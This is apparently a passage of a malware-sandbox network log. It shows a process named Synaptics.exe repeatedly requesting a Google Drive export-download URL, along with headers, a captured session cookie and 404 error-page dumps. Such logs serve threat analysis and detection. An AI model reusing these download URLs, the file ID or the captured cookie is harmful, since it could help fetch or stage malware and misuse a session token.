                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0Rjrrj_fZBEpdGAtUYZu8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 48 66 6c 77 65 2d 34 44 5a 71 4c 33 67 56 62 5f 63 4d 42 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="DHflwe-4DZqL3gVb_cMBFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    15192.168.2.449764142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pB4tCtDlsl37CbPvO7RrNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    16192.168.2.449770142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_mN1Xz8SmpgEbz34mvmc9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    17192.168.2.449771142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC772yqfX8Vr5PZ9SaTmSETjHJBgBiIW4lhiJ3m8XvdntdiNiMoKdtQtndz0ZVgXb28C
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1q2Qaz1c3vKaqdJrVWPd4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 50 51 78 65 6c 51 71 69 62 68 4b 35 74 42 33 54 4f 41 79 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="uPQxelQqibhK5tB3TOAyWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    18192.168.2.449769142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5mvV9VDPvfV3q3htwd_TzHuW1v6YcOl-HmwABmrmLmMrJN2BMZF-0_LSKkFwQa3hWO
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NKTiXMR5I4kFECjrCqQ4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 76 76 6c 33 48 6a 36 66 43 53 33 57 4a 64 38 44 2d 72 32 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="lvvl3Hj6fCS3WJd8D-r2gA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    19192.168.2.449772142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FC1KxSWsj8QIMlZI4LPClg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    20192.168.2.449776142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    21192.168.2.449777142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    22192.168.2.449778142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    23192.168.2.449779142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    24192.168.2.449782142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:14 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-l1T-YZRNs1zO_DVgPmmyXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    25192.168.2.449781142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
